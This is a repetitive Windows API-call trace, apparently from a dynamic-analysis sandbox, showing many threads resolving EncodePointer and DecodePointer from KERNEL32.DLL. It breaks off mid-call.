GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.072] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0205.072] SysReAllocStringLen (in: pbstr=0x16b9fa0c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b9fa0c*="KERNEL32.DLL") returned 1 [0205.072] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.073] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.076] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0205.076] SysReAllocStringLen (in: pbstr=0x16b9f9e8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b9f9e8*="KERNEL32.DLL") returned 1 [0205.076] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.077] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.080] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0205.083] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0205.131] SysReAllocStringLen (in: pbstr=0x16b9fcc0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b9fcc0*="KERNEL32.DLL") returned 1 [0205.131] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.132] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.135] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 224 os_tid = 0x67c [0206.172] SysReAllocStringLen (in: pbstr=0x6aff4e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aff4e4*="KERNEL32.DLL") returned 1 [0206.172] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.173] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.175] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.175] SysReAllocStringLen (in: pbstr=0x6aff4e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aff4e4*="KERNEL32.DLL") returned 1 [0206.175] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.176] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.178] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.178] SysReAllocStringLen (in: pbstr=0x6aff4c0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aff4c0*="KERNEL32.DLL") returned 1 [0206.178] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.178] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.180] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0206.183] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.332] SysReAllocStringLen (in: pbstr=0x6aff798*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aff798*="KERNEL32.DLL") returned 1 [0206.332] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.333] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.336] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 225 os_tid = 0x7f0 [0206.184] SysReAllocStringLen (in: pbstr=0xb6ff7a4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb6ff7a4*="KERNEL32.DLL") returned 1 [0206.184] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.184] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.186] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.187] SysReAllocStringLen (in: pbstr=0xb6ff7a4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb6ff7a4*="KERNEL32.DLL") returned 1 [0206.187] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.187] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.189] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.190] SysReAllocStringLen (in: pbstr=0xb6ff780*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb6ff780*="KERNEL32.DLL") returned 1 [0206.190] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.190] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.192] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0206.194] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.380] SysReAllocStringLen (in: pbstr=0xb6ffa58*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb6ffa58*="KERNEL32.DLL") returned 1 [0206.380] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.381] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.384] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 226 os_tid = 0x6a8 [0206.235] SysReAllocStringLen (in: pbstr=0xb5bf39c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5bf39c*="KERNEL32.DLL") returned 1 [0206.235] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.236] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.239] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.239] SysReAllocStringLen (in: pbstr=0xb5bf39c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5bf39c*="KERNEL32.DLL") returned 1 [0206.239] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.239] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.242] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.242] SysReAllocStringLen (in: pbstr=0xb5bf378*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5bf378*="KERNEL32.DLL") returned 1 [0206.242] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.242] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.244] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0206.247] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.386] SysReAllocStringLen (in: pbstr=0xb5bf650*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5bf650*="KERNEL32.DLL") returned 1 [0206.386] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.390] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 227 os_tid = 0x870 [0206.316] SysReAllocStringLen (in: pbstr=0x16b6fa3c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b6fa3c*="KERNEL32.DLL") returned 1 [0206.316] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.316] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.319] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.319] SysReAllocStringLen (in: pbstr=0x16b6fa3c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b6fa3c*="KERNEL32.DLL") returned 1 [0206.319] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.320] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.322] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.322] SysReAllocStringLen (in: pbstr=0x16b6fa18*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b6fa18*="KERNEL32.DLL") returned 1 [0206.322] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.323] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.326] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0206.330] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.446] SysReAllocStringLen (in: pbstr=0x16b6fcf0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b6fcf0*="KERNEL32.DLL") returned 1 [0206.446] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.447] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.450] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 228 os_tid = 0x5bc [0206.396] SysReAllocStringLen (in: pbstr=0x6abf52c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6abf52c*="KERNEL32.DLL") returned 1 [0206.396] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.397] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.400] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.401] SysReAllocStringLen (in: pbstr=0x6abf52c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6abf52c*="KERNEL32.DLL") returned 1 [0206.401] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.402] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.405] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.406] SysReAllocStringLen (in: pbstr=0x6abf508*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6abf508*="KERNEL32.DLL") returned 1 [0206.406] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.406] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.409] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0206.413] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.451] SysReAllocStringLen (in: pbstr=0x6abf7e0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6abf7e0*="KERNEL32.DLL") returned 1 [0206.451] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.454] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 229 os_tid = 0x968 [0206.686] SysReAllocStringLen (in: pbstr=0x6a8faac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6a8faac*="KERNEL32.DLL") returned 1 [0206.686] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.686] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.690] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.691] SysReAllocStringLen (in: pbstr=0x6a8faac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6a8faac*="KERNEL32.DLL") returned 1 [0206.691] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.691] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.694] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.695] SysReAllocStringLen (in: pbstr=0x6a8fa88*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6a8fa88*="KERNEL32.DLL") returned 1 [0206.695] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.695] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.698] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0206.702] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.706] SysReAllocStringLen (in: pbstr=0x6a8fd60*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6a8fd60*="KERNEL32.DLL") returned 1 [0206.707] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.707] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.710] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 231 os_tid = 0x340 [0207.379] SysReAllocStringLen (in: pbstr=0xb5ff7bc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5ff7bc*="KERNEL32.DLL") returned 1 [0207.379] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.380] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.383] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.384] SysReAllocStringLen (in: pbstr=0xb5ff7bc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5ff7bc*="KERNEL32.DLL") returned 1 [0207.384] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.384] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.387] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.387] SysReAllocStringLen (in: pbstr=0xb5ff798*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5ff798*="KERNEL32.DLL") returned 1 [0207.387] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.388] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.391] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0207.394] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.541] SysReAllocStringLen (in: pbstr=0xb5ffa70*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5ffa70*="KERNEL32.DLL") returned 1 [0207.541] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.542] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.544] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 232 os_tid = 0xad0 [0207.435] SysReAllocStringLen (in: pbstr=0x658fa14*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x658fa14*="KERNEL32.DLL") returned 1 [0207.435] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.436] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.438] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.438] SysReAllocStringLen (in: pbstr=0x658fa14*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x658fa14*="KERNEL32.DLL") returned 1 [0207.439] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.439] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.441] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.441] SysReAllocStringLen (in: pbstr=0x658f9f0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x658f9f0*="KERNEL32.DLL") returned 1 [0207.441] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.442] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.444] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0207.446] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.606] SysReAllocStringLen (in: pbstr=0x658fcc8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x658fcc8*="KERNEL32.DLL") returned 1 [0207.607] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.607] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.610] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 233 os_tid = 0xae4 [0207.479] SysReAllocStringLen (in: pbstr=0xb74fa0c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb74fa0c*="KERNEL32.DLL") returned 1 [0207.479] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.479] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.483] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.483] SysReAllocStringLen (in: pbstr=0xb74fa0c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb74fa0c*="KERNEL32.DLL") returned 1 [0207.483] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.484] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.486] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.487] SysReAllocStringLen (in: pbstr=0xb74f9e8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb74f9e8*="KERNEL32.DLL") returned 1 [0207.487] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.487] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.489] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0207.492] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.680] SysReAllocStringLen (in: pbstr=0xb74fcc0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb74fcc0*="KERNEL32.DLL") returned 1 [0207.680] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.681] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.684] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 234 os_tid = 0xcc [0207.545] SysReAllocStringLen (in: pbstr=0x938f99c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x938f99c*="KERNEL32.DLL") returned 1 [0207.545] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.545] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.548] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.548] SysReAllocStringLen (in: pbstr=0x938f99c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x938f99c*="KERNEL32.DLL") returned 1 [0207.548] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.548] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.551] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.551] SysReAllocStringLen (in: pbstr=0x938f978*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x938f978*="KERNEL32.DLL") returned 1 [0207.551] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.553] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0207.556] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.709] SysReAllocStringLen (in: pbstr=0x938fc50*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x938fc50*="KERNEL32.DLL") returned 1 [0207.709] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.710] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.712] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 235 os_tid = 0xd0 [0207.588] SysReAllocStringLen (in: pbstr=0x16b6f654*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b6f654*="KERNEL32.DLL") returned 1 [0207.588] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.589] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.593] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.593] SysReAllocStringLen (in: pbstr=0x16b6f654*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b6f654*="KERNEL32.DLL") returned 1 [0207.593] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.594] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.597] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.597] SysReAllocStringLen (in: pbstr=0x16b6f630*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b6f630*="KERNEL32.DLL") returned 1 [0207.597] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.598] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.601] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0207.604] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0207.714] SysReAllocStringLen (in: pbstr=0x16b6f908*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b6f908*="KERNEL32.DLL") returned 1 [0207.714] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0207.714] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0207.717] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 236 os_tid = 0xd4 [0208.013] SysReAllocStringLen (in: pbstr=0xb5dfa34*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5dfa34*="KERNEL32.DLL") returned 1 [0208.013] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.014] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.016] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0208.016] SysReAllocStringLen (in: pbstr=0xb5dfa34*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5dfa34*="KERNEL32.DLL") returned 1 [0208.016] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.017] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.019] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0208.019] SysReAllocStringLen (in: pbstr=0xb5dfa10*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5dfa10*="KERNEL32.DLL") returned 1 [0208.019] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.019] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.021] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0208.024] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0208.247] SysReAllocStringLen (in: pbstr=0xb5dfce8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5dfce8*="KERNEL32.DLL") returned 1 [0208.247] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.248] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.250] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 237 os_tid = 0xd8 [0208.325] SysReAllocStringLen (in: pbstr=0x657f864*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657f864*="KERNEL32.DLL") returned 1 [0208.325] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.326] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.329] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0208.329] SysReAllocStringLen (in: pbstr=0x657f864*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657f864*="KERNEL32.DLL") returned 1 [0208.329] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.330] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.333] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0208.333] SysReAllocStringLen (in: pbstr=0x657f840*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657f840*="KERNEL32.DLL") returned 1 [0208.333] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.333] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.336] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0208.339] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0208.431] SysReAllocStringLen (in: pbstr=0x657fb18*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657fb18*="KERNEL32.DLL") returned 1 [0208.431] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.431] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.435] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 238 os_tid = 0xdc [0208.341] SysReAllocStringLen (in: pbstr=0x168cf94c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168cf94c*="KERNEL32.DLL") returned 1 [0208.341] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.342] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.345] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0208.345] SysReAllocStringLen (in: pbstr=0x168cf94c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168cf94c*="KERNEL32.DLL") returned 1 [0208.345] CharLowerBuffW (in: lpsz="KERNEL32.DLL", 